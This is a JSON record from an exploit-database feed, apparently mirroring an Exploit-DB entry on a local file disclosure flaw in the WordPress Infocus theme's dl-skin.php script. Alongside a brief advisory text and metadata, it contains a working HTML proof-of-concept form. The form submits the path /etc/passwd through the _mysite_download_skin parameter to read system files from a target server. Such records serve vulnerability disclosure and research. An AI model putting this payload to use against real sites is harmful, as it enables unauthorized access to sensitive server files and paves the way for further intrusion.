{"id": "EDB-ID:39211", "hash": "863a193c822ebd9fcb0d4a4de3df2e72", "type": "exploitdb", "bulletinFamily": "exploit", "title": "WordPress Infocus Theme '/infocus/lib/scripts/dl-skin.php' Local File Disclosure Vulnerability", "description": "WordPress Infocus Theme '/infocus/lib/scripts/dl-skin.php' Local File Disclosure Vulnerability. Webapps exploit for php platform", "published": "2014-06-08T00:00:00", "modified": "2014-06-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/39211/", "reporter": "Felipe Andrian Peixoto", "references": [], "cvelist": [], "lastseen": "2016-02-04T09:43:14", "history": [], "viewCount": 2, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-02-04T09:43:14"}, "dependencies": {"references": [], "modified": "2016-02-04T09:43:14"}, "vulnersScore": -0.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/39211/", "sourceData": "source: http://www.securityfocus.com/bid/67934/info\r\n\r\nThe Infocus theme for WordPress is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.\r\n\r\nExploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. \r\n\r\n<html>\r\n<body>\r\n<form action=\"http://www.site.com/wp-content/themes/infocus/lib/scripts/dl-skin.php\" method=\"post\">\r\nDownload:<input type=\"text\" name=\"_mysite_download_skin\" value=\"/etc/passwd\"><br>\r\n<input type=\"submit\">\r\n</form>\r\n</body>\r\n</html>\r\n", "osvdbidlist": ["101331"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{}